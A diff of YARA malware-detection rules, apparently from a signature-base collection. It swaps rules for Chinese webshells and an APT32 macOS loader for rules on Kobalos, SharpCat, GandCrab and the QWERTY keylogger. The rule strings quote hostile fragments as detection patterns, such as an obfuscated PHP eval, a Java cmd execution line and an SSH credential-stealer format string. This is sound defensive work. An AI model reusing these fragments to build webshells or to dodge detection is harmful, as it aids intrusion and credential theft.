+		$asn1_84 = { 76 84 ?? ?? ?? ?? 30 84 ?? ?? ?? ?? a0 84 00 00 00 03 02 01 05 a1 84 00 00 00 03 02 01 16 }
 
 	condition:
-		(pe.is_64bit ( ) or pe.is_32bit ( ) ) and all of them
+		$asn1 at 0 or $asn1_84 at 0
 }
-rule SIGNATURE_BASE_EXT_APT32_Osx_Backdoor_Loader : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Kobalos : FILE
 {
 	meta:
-		description = "Detects APT32 backdoor loader on OSX"
-		author = "Facebook"
-		id = "ac313bd8-bf15-5b72-b651-35015f71dd90"
-		date = "2023-12-05"
+		description = "Kobalos malware"
+		author = "Marc-Etienne M.Leveille"
+		id = "dfa47e30-c093-57f6-af01-72a2534cc6f4"
+		date = "2020-11-02"
 		modified = "2023-12-05"
-		reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt32.yar#L22-L49"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lnx_kobalos.yar#L32-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "768510fa9eb807bba9c3dcb3c7f87b771e20fa3d81247539e9ea4349205e39eb"
-		logic_hash = "26964f95a9298b838e06fb9d7f739c8b87a976d8da7fb08416e952d26e84b84e"
+		logic_hash = "48aec47b70633d4c8cb55d90a2e168f3c2027ef27cfe1cd5d30dcdc08a2ff717"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$a1 = { 00 D2 44 8A 04 0F 44 88 C0 C0 E8 07 08 D0 88 44 0F FF 48 FF C1 48 83 F9 10 44 88 C2 }
-		$a2 = { 41 0F 10 04 07 0F 57 84 05 A0 FE FF FF 41 0F 11 04 07 48 83 C0 10 48 83 F8 10 75 }
-		$e1 = { CA CF 3E F2 DA 43 E6 D1  D5 6C D4 23 3A AE F1 B2 }
-		$e2 = "MlkHVdRbOkra9s+G65MAoLga340t3+zj/u8LPfP3hig="
-		$e3 = { 5A 69 98 0E 6C 4B 5C 69  7E 19 34 3B C3 07 CA 13 }
-		$e4 = "1Sib4HfPuRQjpxIpECnxxTPiu3FXOFAHMx/+9MEVv9M+h1ngV7T5WUP3b0zsg0Qd"
-		$e5 = "_ArchaeologistCodeine"
-		$e6 = "_PlayerAberadurtheIncomprehensible"
+		$encrypted_strings_sizes = {
+            05 00 00 00 09 00 00 00  04 00 00 00 06 00 00 00
+            08 00 00 00 08 00 00 00  02 00 00 00 02 00 00 00
+            01 00 00 00 01 00 00 00  05 00 00 00 07 00 00 00
+            05 00 00 00 05 00 00 00  05 00 00 00 0A 00 00 00
+        }
+		$password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C }
+		$rsa_512_mod_header = { 10 11 02 00 09 02 00 }
+		$strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE }
 
 	condition:
-		(( uint32( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedface ) or ( uint32( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xfeedfacf ) ) and ( 2 of ( $e* ) or all of ( $a* ) )
+		uint16( 0 ) == 0x457f and any of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php5 : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Kobalos_SSH_Credential_Stealer : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php5.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ee063c4c-af06-520f-acfe-fba758b84d3c"
-		date = "2015-06-23"
+		description = "Kobalos SSH credential stealer seen in OpenSSH client"
+		author = "Marc-Etienne M.Leveille"
+		id = "0f923f92-c5d8-500d-9a2e-634ca7945c5c"
+		date = "2020-11-02"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L8-L23"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lnx_kobalos.yar#L59-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0fd91b6ad400a857a6a65c8132c39e6a16712f19"
-		logic_hash = "e882f115a67fe31ece1a81e1a2770b46370a92ac3aa23e348a12cdb5735e8a0e"
-		score = 70
+		logic_hash = "fdabaea0c838e43b8716bcd102bdeebf2f08fc041b0b909333e3d9d6f94391fc"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s0 = "else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user" ascii
-		$s20 = "echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump').\"<b>\".$" ascii
+		$ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s"
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 300KB and all of them
+		uint16( 0 ) == 0x457f and any of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Test3693 : FILE
+rule SIGNATURE_BASE_Sharpcat : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file test3693.war"
+		description = "Detects command shell SharpCat - file SharpCat.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "58fe4445-b2e1-5d5f-8c46-39c6ae78f845"
-		date = "2015-06-23"
+		id = "94a7ce40-ac2f-598e-86c5-ee9fde1eeef0"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L25-L40"
+		reference = "https://github.com/Cn33liz/SharpCat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sharpcat.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "246d629ae3ad980b5bfe7e941fe90b855155dbfc"
-		logic_hash = "a10618d54fb7adbbd89a10f2e1ac067ccd1832140bcaf3b92394ebe7323f2d1e"
-		score = 70
+		logic_hash = "4a38812b07b40bdde03049dbff1f9de38cadaf9941ab8b40b84016b1d5cbfd51"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "96dcdf68b06c3609f486f9d560661f4fec9fe329e78bd300ad3e2a9f07e332e9"
 
 	strings:
-		$s0 = "Process p=Runtime.getRuntime().exec(\"cmd /c \"+strCmd);" fullword ascii
-		$s2 = "http://www.topronet.com </font>\",\" <font color=red> Thanks for your support - " ascii
+		$x1 = "ShellZz" fullword ascii
+		$s2 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$s3 = "currentDirectory" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Mycode12 : FILE
+
+rule SIGNATURE_BASE_MAL_Gandcrab_Apr18_1 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file mycode12.cfm"
+		description = "Detects GandCrab malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2ce7368c-7565-5b32-94d1-c87023404c5b"
-		date = "2015-06-23"
+		id = "ef7983cd-a7b3-5ce2-8cff-1bcf35bc6140"
+		date = "2018-04-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L42-L57"
+		reference = "https://twitter.com/MarceloRivero/status/988455516094550017"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mal_grandcrab.yar#L3-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "64be8760be5ab5c2dcf829e3f87d3e50b1922f17"
-		logic_hash = "94cb0e414634af753db9ec0c63a3a34b4f9104e93e01d67cebab7b3a0c471198"
-		score = 70
+		logic_hash = "70fc8deb91126a7404095aaa512e9b7542fe8605f83a037a10f8ccff76c27d4f"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "<cfexecute name=\"cmd.exe\"" fullword ascii
-		$s2 = "<cfoutput>#cmd#</cfoutput>" fullword ascii
+		hash1 = "6fafe7bb56fd2696f2243fc305fe0c38f550dffcfc5fca04f70398880570ffff"
 
 	condition:
-		filesize < 4KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "7936b0e9491fd747bf2675a7ec8af8ba"
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Offlibrary : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20121
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file offlibrary.php"
+		description = "FiveEyes QUERTY Malware - file 20121.xml"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c01f7c8b-a6bd-5094-9574-8cc853698607"
-		date = "2015-06-23"
+		id = "bf30bdbb-0153-5ae2-bf42-4bd9e4a2f088"
+		date = "2015-01-18"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L59-L74"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L3-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "eb5275f99211106ae10a23b7e565d208a94c402b"
-		logic_hash = "ffec24bedfe0794e8f92da5067c41932339e61ec23d71a67ed4b634434cd10d6"
-		score = 70
+		hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
+		logic_hash = "e2660abf4959bc57bcf9d95d974cd20718d5d27f371109cb4526cee208544530"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "';$i=$g->query(\"SELECT SUBSTRING_INDEX(CURRENT_USER, '@', 1) AS User, SUBSTRING" ascii
-		$s12 = "if(jushRoot){var script=document.createElement('script');script.src=jushRoot+'ju" ascii
+		$s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20121.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
 
 	condition:
-		filesize < 1005KB and all of them
+		9 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Cfm_Xl : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20123_Sys
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file xl.cfm"
+		description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5c8d1301-fe20-50e0-86ac-99a220cd4be1"
-		date = "2015-06-23"
+		id = "0d0e3642-f5d4-59b2-8e56-a7c999e34775"
+		date = "2015-01-18"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L76-L91"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "49c3d16ee970945367a7d6ae86b7ade7cb3b5447"
-		logic_hash = "b6683a24ad58a9444ec91f13e7da5db3e3e768afded09a23e1bbd0a0c23cf6b9"
-		score = 70
+		hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
+		logic_hash = "881af0e2ff8fad2bca2ae05ad63b5185356181685daafa7a1b9992a1de017c9e"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<input name=\"DESTINATION\" value=\"" ascii
-		$s1 = "<CFFILE ACTION=\"Write\" FILE=\"#Form.path#\" OUTPUT=\"#Form.cmd#\">" fullword ascii
+		$s0 = "20123.dll" fullword ascii
+		$s1 = "kbdclass.sys" fullword wide
+		$s2 = "IoFreeMdl" fullword ascii
+		$s3 = "ntoskrnl.exe" fullword ascii
+		$s4 = "KfReleaseSpinLock" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x433c and filesize < 13KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Linux : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20123_Cmddef
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file linux.txt"
+		description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d94f1c5-2139-5d0d-8af9-9c30a0359910"
-		date = "2015-06-23"
+		id = "88a29288-9db5-5437-9efe-cdb823a2b928"
+		date = "2015-01-18"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L93-L108"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L47-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "78339abb4e2bb00fe8a012a0a5b7ffce305f4e06"
-		logic_hash = "2c6278acd123e0d41ed4f0f8f0da27d5de1ad56efb8102c9eae442838a0416d0"
-		score = 70
-		quality = 85
-		tags = "FILE"
+		hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
+		logic_hash = "84776764caa79ad68f2dd0d2f890821c75f2efba7c46d674110ba870a40a372a"
+		score = 75
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<form name=form1 action=exploit.php method=post>" fullword ascii
-		$s1 = "<title>Changing CHMOD Permissions Exploit " fullword ascii
+		$s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
+		$s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
+		$s2 = "<commands/>" fullword ascii
+		$s3 = "</version>" fullword ascii
+		$s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
+		$s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
+		$s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
+		$s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
+		$s8 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s9 = "<minorType>0</minorType>" fullword ascii
+		$s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
+		$s11 = "</comments>" fullword ascii
+		$s12 = "<comments>" fullword ascii
+		$s13 = "<majorType>1</majorType>" fullword ascii
+		$s14 = "<files>None</files>" fullword ascii
+		$s15 = "<poc>Erebus</poc>" fullword ascii
+		$s16 = "</plugin>" fullword ascii
+		$s17 = "<team>None</team>" fullword ascii
+		$s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
+		$s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
+		$s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
 
 	condition:
-		uint16( 0 ) == 0x696c and filesize < 6KB and all of them
+		14 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Interception3389_Get : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20121_Dll
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file get.asp"
+		description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b17a793f-ffb7-5cdc-ba21-b0e2f0d14490"
-		date = "2015-06-23"
+		id = "a0dc146c-85fd-55b8-a5e0-bfc1f406507e"
+		date = "2015-01-18"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L110-L126"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L82-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ceb6306f6379c2c1634b5058e1894b43abcf0296"
-		logic_hash = "649e611c9d8948e60811af4209d737b3e797e6b42beba42439541ae543b062d6"
-		score = 70
+		hash = "89504d91c5539a366e153894c1bc17277116342b"
+		logic_hash = "e735a7c26652cbf2bccac80a14568a3582b254ae25e2db56a46c09a714650611"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "userip = Request.ServerVariables(\"HTTP_X_FORWARDED_FOR\")" fullword ascii
-		$s1 = "file.writeline  szTime + \" HostName:\" + szhostname + \" IP:\" + userip+\":\"+n" ascii
-		$s3 = "set file=fs.OpenTextFile(server.MapPath(\"WinlogonHack.txt\"),8,True)" fullword ascii
+		$s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
+		$s1 = "20121.dll" fullword ascii
 
 	condition:
-		filesize < 3KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Nc_1 : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20123
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file 1.txt"
+		description = "FiveEyes QUERTY Malware - file 20123.xml"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fe83df79-f7cb-50b8-bb34-9bfc5fbe3de2"
-		date = "2015-06-23"
+		id = "718d80c9-b6bb-5b73-9c17-49e7d6f77210"
+		date = "2015-01-18"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L128-L143"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L97-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "51d83961171db000fe4476f36d703ef3de409676"
-		logic_hash = "80ea8f16d943a3775fe9999131272af9e7f1af60d413109e58ecdef036484760"
-		score = 70
+		hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
+		logic_hash = "918462399af78b16a8214ceb1d39db554e3136efd4bc643353f0727e4a162516"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 " ascii
-		$s2 = "<%if session(\"pw\")<>\"go\" then %>" fullword ascii
+		$s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
+		$s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
+		$s2 = "<name>20123.sys</name>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
+		$s5 = "<platform type=\"1\">" fullword ascii
+		$s6 = "</plugin>" fullword ascii
+		$s7 = "</pluginConfig>" fullword ascii
+		$s8 = "<pluginConfig>" fullword ascii
+		$s9 = "</platform>" fullword ascii
+		$s10 = "</lpConfig>" fullword ascii
+		$s11 = "<lpConfig>" fullword ascii
 
 	condition:
-		filesize < 11KB and all of them
+		9 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Blacksky : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20120_Dll
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php6.txt"
+		description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "741bb4db-6296-5222-8480-1169a6f44fd8"
-		date = "2015-06-23"
+		id = "d23ac7bf-3e0c-5b59-a9dc-1ae0a4ae9c02"
+		date = "2015-01-18"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L145-L160"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L123-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a60a599c6c8b6a6c0d9da93201d116af257636d7"
-		logic_hash = "3b92f63f536361d8ba0cde853fb546f271abdec3a7c1d44688a42610f5f90c57"
-		score = 70
-		quality = 85
-		tags = "FILE"
+		hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
+		logic_hash = "fc3aac33c84d3b4a981c2d1a9358c54dc5ceca2017dbf2e2a51e1b6970b90796"
+		score = 75
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "eval(gzinflate(base64_decode('" ascii
-		$s1 = "B1ac7Sky-->" fullword ascii
+		$s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" wide
+		$s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" wide
+		$s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
+		$s3 = "- Log Used (number of windows) - %d" fullword wide
+		$s4 = "- Log Limit (number of windows) - %d" fullword wide
+		$s5 = "Process or User Default Language" fullword wide
+		$s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
+		$s7 = "- Logging of keystrokes is switched ON" fullword wide
+		$s8 = "- Logging of keystrokes is switched OFF" fullword wide
+		$s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
+		$s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
+		$s11 = "FAILED to get Qwerty Status" fullword wide
+		$s12 = "- Successfully retrieved Log from Implant." fullword wide
+		$s13 = "- Logging of all Windows is toggled ON" fullword wide
+		$s14 = "- Logging of all Windows is toggled OFF" fullword wide
+		$s15 = "Qwerty FAILED to retrieve window list." fullword wide
+		$s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide
+		$s17 = "The implant failed to return a valid status" fullword ascii
+		$s18 = "- Log files were NOT generated!" fullword wide
+		$s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
+		$s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
 
 	condition:
-		filesize < 641KB and all of them
+		10 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp3 : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20120_Cmddef
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp3.txt"
+		description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0cb01c07-b424-532d-8aef-5ec25dfe3f19"
-		date = "2015-06-23"
+		id = "dfa0693e-4e4c-59c8-9e51-e221aefd8662"
+		date = "2015-01-18"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L162-L177"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L158-L191"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "87c5a76989bf08da5562e0b75c196dcb3087a27b"
-		logic_hash = "e5f30a445be30c491e669c633bf2df08cbfb1017ecfc91f9ed83275550488304"
-		score = 70
-		quality = 85
-		tags = "FILE"
+		hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
+		logic_hash = "9c336a09adb5fdf3149e5d0ad716cb854f95effa4ce4dfe3e75f43031e4903ff"
+		score = 75
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if shellpath=\"\" then shellpath = \"cmd.exe\"" fullword ascii
-		$s2 = "c.open \"GET\", \"http://127.0.0.1:\" & port & \"/M_Schumacher/upadmin/s3\", Tru" ascii
+		$s0 = "This PPC gets the current keystroke log." fullword ascii
+		$s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
+		$s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
+		$s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
+		$s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
+		$s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
+		$s6 = "<name>Get Keystroke Log</name>" fullword ascii
+		$s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
+		$s8 = "<definition>display help for this function</definition>" fullword ascii
+		$s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
+		$s10 = "Set the log limit (in number of windows)" fullword ascii
+		$s11 = "<example>qwgetlog</example>" fullword ascii
+		$s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
+		$s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
+		$s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
+		$s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
+		$s16 = "<command id=\"32\">" fullword ascii
+		$s17 = "<command id=\"3\">" fullword ascii
+		$s18 = "<command id=\"7\">" fullword ascii
+		$s19 = "<command id=\"1\">" fullword ascii
+		$s20 = "<command id=\"4\">" fullword ascii
 
 	condition:
-		filesize < 444KB and all of them
+		10 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Sniff : FILE
+rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20120
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file sniff.txt"
+		description = "FiveEyes QUERTY Malware - file 20120.xml"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8cf47d71-1b97-5967-ad70-2ea6fad7cc29"
-		date = "2015-06-23"
+		id = "503c71de-1bc5-5690-944c-a60917a4da09"
+		date = "2015-01-18"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L179-L194"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
